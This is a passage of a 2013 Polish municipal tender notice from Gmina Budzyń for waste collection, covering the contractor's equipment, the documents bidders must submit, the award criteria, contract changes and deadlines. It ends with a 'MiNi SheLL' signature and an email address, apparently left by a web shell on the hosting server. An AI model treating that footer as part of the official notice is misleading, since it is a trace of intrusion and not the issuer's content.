wymaganiami określonymi w przepisach ustawy Prawo wodne. Baza magazynowo - transportowa musi być wyposażona w: miejsca przeznaczone do parkowania pojazdów, pomieszczenie socjalne  dla pracowników odpowiadające ilości zatrudnionych osób, miejsca                              do magazynowania selektywnie zebranych odpadów z grupy odpadów komunalnych, legalizowaną samochodową wagę najazdową - w przypadku gdy na terenie bazy następuje magazynowanie odpadów. Na terenie bazy powinny znajdować się także: punkt bieżącej konserwacji i naprawy pojazdów, miejsca do mycia i dezynfekcji pojazdów (o ile czynności te nie będą wykonywane przez uprawnione podmioty zewnętrzne poza terenem bazy). Na terenie bazy muszą znajdować się urządzenia   do selektywnego gromadzenia odpadów komunalnych przed ich transportem do miejsc przetwarzania;
2) będzie dysponował co najmniej: 2 pojazdami przystosowanymi do odbierania zmieszanych odpadów komunalnych, 2 pojazdami przystosowanymi do odbierania selektywnie zbieranych odpadów komunalnych, 1 pojazdem do odbierania odpadów bez funkcji kompaktującej. Pojazdy te muszą być trwale i czytelnie oznakowane w widocznym miejscu nazwą firmy oraz danymi teleadresowymi podmiotu odbierającego odpady komunale od właścicieli nieruchomości. Pojazdy muszą posiadać konstrukcję zabezpieczającą przed rozwiewaniem i rozpylaniem przewożonych odpadów oraz minimalizującą oddziaływanie czynników atmosferycznych na odpady. Pojazdy muszą być wyposażone w system monitoringu bazującego na systemie pozycjonowania satelitarnego umożliwiające trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu pojazdu i miejscach postoju oraz czujników zapisujących dane o miejscach wyładunku odpadów umożliwiających weryfikację tych danych przez Zamawiającego. Pojazdy muszą być wyposażone w narzędzia lub urządzenia umożliwiające sprzątanie terenu po opróżnieniu pojemników. Dopuszcza się wyposażenie pojazdów w urządzenie do ważenia odpadów komunalnych. Na wyposażeniu pojazdu do odbioru odpadów komunalnych musi być aparat cyfrowy, który umożliwi monitorowanie i kontrolę segregacji odpadów na terenie poszczególnych nieruchomości.
UWAGA:
Wykonawca powinien dysponować samochodem przystosowanym do obsługi systemu molok w zakresie opróżniania pojemników z odpadów komunalnych zmieszanych i segregowanych. Zamawiający planuje wyposażyć w ten system Spółdzielnie Mieszkaniowe w II półroczu2013roku-w ilości około 30sztuk, o pojemności 3,0m3i 5,0m3.
 Wykonawca na udokumentowanie spełnienia warunku złoży: 
-oświadczenie o posiadaniu odpowiednio wyposażonej  bazy magazynowo - transportowej wraz z wykazem posiadanego odpowiedniego sprzętu.
Zgodnie z  załącznikiem nr  7 do SIWZ.
Zamawiający dokona oceny spełniania warunków na zasadzie spełnia lub nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonania oceny spełnienia tego warunku: 

Wykonawca musi dysponować osobami (pracownikami) gwarantującymi sprawna realizację przedmiotu zamówienia zgodnie z harmonogramem wywozów odpadów. Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania przedmiotowego warunku
Ocena na podstawie oświadczenia wykonawcy, że spełnia wszystkie warunki określone przepisami art. 22 ust. 1 ustawy oraz dokumentów złożonych przez Wykonawcę w ofercie;

Zgodnie z  załącznikiem nr 4 do SIWZ.
Zamawiający dokona oceny spełniania warunków na zasadzie spełnia lub nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonania oceny spełnienia tego warunku:  
Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania przedmiotowego warunku
Ocena na podstawie oświadczenia wykonawcy, że spełnia wszystkie warunki określone przepisami art. 22 ust. 1 ustawy oraz dokumentów złożonych przez Wykonawcę w ofercie

Zgodnie z  załącznikiem nr 4 do SIWZ.
Zamawiający dokona oceny spełniania warunków na zasadzie spełnia lub nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Niezwłocznie po wyborze najkorzystniejszej oferty Zamawiający jednocześnie
    zawiadamia Wykonawców, którzy złożyli oferty, o:
a) wyborze najkorzystniejszej oferty, podając nazwę (firmę) albo imię i nazwisko, siedzibę albo miejsce zamieszkania i adres Wykonawcy, którego ofertę wybrano, uzasadnienie jej wyboru oraz nazwy (firmy) albo imiona i nazwiska, siedziby, albo miejsca zamieszkania i adresy Wykonawców, którzy złożyli oferty a także punktację przyznaną ofertom w kryterium oceny ofert;
b) Wykonawcach, których oferty zostały odrzucone, podając uzasadnienie prawne i faktyczne;
c) Wykonawcach, którzy zostali wykluczeni z postępowania o udzielenie zamówienie,                      podając uzasadnienie podając uzasadnienie prawne i faktyczne;
d) terminie, określonym zgodnie z art. 94 ust. 1 lub 2 ustawy, po którego upływie umowa w sprawie zamówienia publicznego może być zawarta.

2. Niezwłocznie po wyborze najkorzystniejszej oferty Zamawiający zamieści informacje,
    o której mowa w pkt. 1 lit. a na stronie internetowej, gdzie zamieszczona została
    specyfikacja  oraz w miejscu publicznie dostępnym w swojej siedzibie.
3.Jeżeli zostanie wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie
   zamówienia, zamawiający zażąda, przed zawarciem umowy w sprawie zamówienia
   publicznego, umowy regulującej współpracę tych Wykonawców.
4.Szczegółowe postanowienia umowy zawarto w projekcie umowy stanowiącym załącznik
    nr 11 do SIWZ.
5.Zamawiający przewiduje możliwość istotnych zmian postanowień umowy w stosunku do
   treści oferty, na podstawie której dokonano wyboru wykonawcy w szczególności:

a)Zamawiający dopuszcza zmianę postanowień umowy w stosunku do treści złożonej oferty w zakresie zmiany całkowitej wartości zadania powstałej na skutek zmiany obowiązującej stawki podatku VAT w trakcie realizowanego zamówienia. Podstawą do tego będzie zmiana obowiązujących przepisów prawnych  w tym zakresie
b)Dopuszcza się zmianę świadczenia Wykonawcy na świadczenie lepszej jakości przy zachowaniu tożsamości przedmiotu zamówienia.
c)Zmiana postanowień niniejszej Umowy w stosunku do treści oferty Wykonawcy w zakresie
wynagrodzenia za realizację przedmiotu zamówienia dopuszczalna jest w przypadku: 
- zmiany wysokości innych opłat wynikających wprost z przepisów prawa a mających istotny
wpływ na koszty świadczenia usługi; 
- innej zmiany prawa powszechnie obowiązującego wpływającej na zasady odbierania i
zagospodarowania odpadów; 
- odstąpienia na wniosek Zamawiającego od realizacji części zamówienia i związanej                           z tym zmiany wynagrodzenia, pod warunkiem wystąpienia obiektywnych  okoliczności, których Zamawiający nie mógł przewidzieć na etapie przygotowania postępowania,                         a które powodują, że wykonanie przedmiotu zamówienia bez ograniczenia zakresu zamówienia, powodowałoby dla Zamawiającego niekorzystne skutki z uwagi na zamierzony cel realizacji przedmiotu zamówienia i związane z tym racjonalne wydatkowanie środków publicznych,;
- wprowadzenia zmian w stosunku do Opisu Przedmiotu Zamówienia w zakresie wykonania prac nie wykraczających poza zakres przedmiotu zamówienia, w sytuacji konieczności zwiększenia usprawnienia procesu realizacji zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.budzyn.pl (bip)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Budzyń, ul. Lipowa 6, 64-840 Budzyń (bezpłatnie, na wniosek ), pok. nr 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2013 godzina 11:30, miejsce: Urząd Gminy Budzyń, ul. Lipowa 6, 64-840 Budzyń (sekretariat urzędu, pok.nr 12).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com